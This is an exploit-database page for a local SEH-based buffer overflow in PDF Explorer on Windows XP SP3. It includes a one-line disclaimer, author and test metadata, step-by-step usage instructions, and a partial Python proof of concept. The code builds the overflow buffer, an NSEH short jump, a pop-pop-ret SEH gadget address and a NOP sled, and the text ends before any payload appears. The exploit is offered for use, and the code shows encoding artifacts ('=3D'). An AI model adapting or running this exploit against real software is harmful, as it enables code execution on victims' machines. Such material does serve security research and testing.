Pdf explorer buffer overflow (seh) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2018-12-19 |
Type : local |
Platform : windows
This exploit / vulnerability Pdf explorer buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
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# Exploit Title: PDF Explorer SEH Local Exploit
# Original Discovery:Gionathan "John" Reale (DoS exploit)
# Exploit Author: Achilles
# Date: 18-12-2018
# Vendor Homepage: http://www.rttsoftware.com/
# Software Link: https://www.rttsoftware.com/files/PDFExplorerTrialSetup.zip
# Tested Version:
# Tested on: Windows XP SP3
# 1.- Run python code : PDF_Explorer.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open PDF Explorer
# 4.- When inside the program click "Database" > "Custom fields settings...
# 5.- Paste the content of EVIL.txt into the Field:'Label'and the calculator will Open
# 7.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/env python
buffer =3D "\x41" * 292
NSEH =3D "\xeb\x06\x90\x90" #jmp short 6
SEH =3D "\x3f\x28\xd1\x72" #0x72d1283f pop eax # pop esi # ret 0x04 [msacm32.drv]
nops =3D "\x90" * 20